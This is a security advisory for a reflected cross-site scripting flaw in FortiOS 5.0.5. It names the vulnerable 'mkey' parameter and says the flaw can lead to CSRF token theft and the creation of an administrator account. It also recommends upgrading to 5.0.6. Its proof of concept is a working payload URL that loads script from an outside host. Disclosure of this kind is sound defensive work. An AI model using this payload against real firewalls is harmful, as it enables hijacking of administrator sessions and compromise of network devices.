FortiOS 5.0.5 Cross Site Scripting

`I. VULNERABILITY  
  
-------------------------  
  
Reflected XSS Attacks vulnerabilities in FortiOS 5.0.5  
  
  
  
II. BACKGROUND  
  
-------------------------  
  
Fortinet's industry-leading, Network Security Platforms deliver Next  
Generation Firewall (NGFW) security with exceptional throughput, ultra  
low latency, and multi-vector threat protection.  
  
  
  
III. DESCRIPTION  
  
-------------------------  
  
Has been detected a Reflected XSS vulnerability in FortiOS in 5.0.5.  
  
The code injection is done through the parameter "mkey" in the page  
/firewall/schedule/recurrdlg"  
  
  
  
IV. PROOF OF CONCEPT  
  
-------------------------  
  
The application does not validate the parameter "mkey" correctly.  
  
  
  
http://IP_FORTIGATE/firewall/schedule/recurrdlg?mkey=a"><SCRIPT  
SRC="http://10.0.1.120/xss/good.js"></SCRIPT>  
  
V. BUSINESS IMPACT  
-------------------------  
An attacker can execute arbitrary HTML or script code in a  
targeteduser's browser, , that allows the execution of arbitrary  
HTML/script code to be executed in the context of the victim user's  
browser allowing theft CSRF token, thus enabling the creation of a  
Administrator User in box for full access  
  
  
  
  
  
VI. SYSTEMS AFFECTED  
-------------------------  
Try FortiOS v5.0.5 VM and Applaince  
  
  
  
VII. SOLUTION  
------------------------  
  
Upgrade to FortiOS 5.0.6 or higher.  
  
References  
  
http://www.fortiguard.com/advisory/FG-IR-14-003/http://www.kb.cert.org/vuls/id/728638  
  
  
  
By William Costa  
`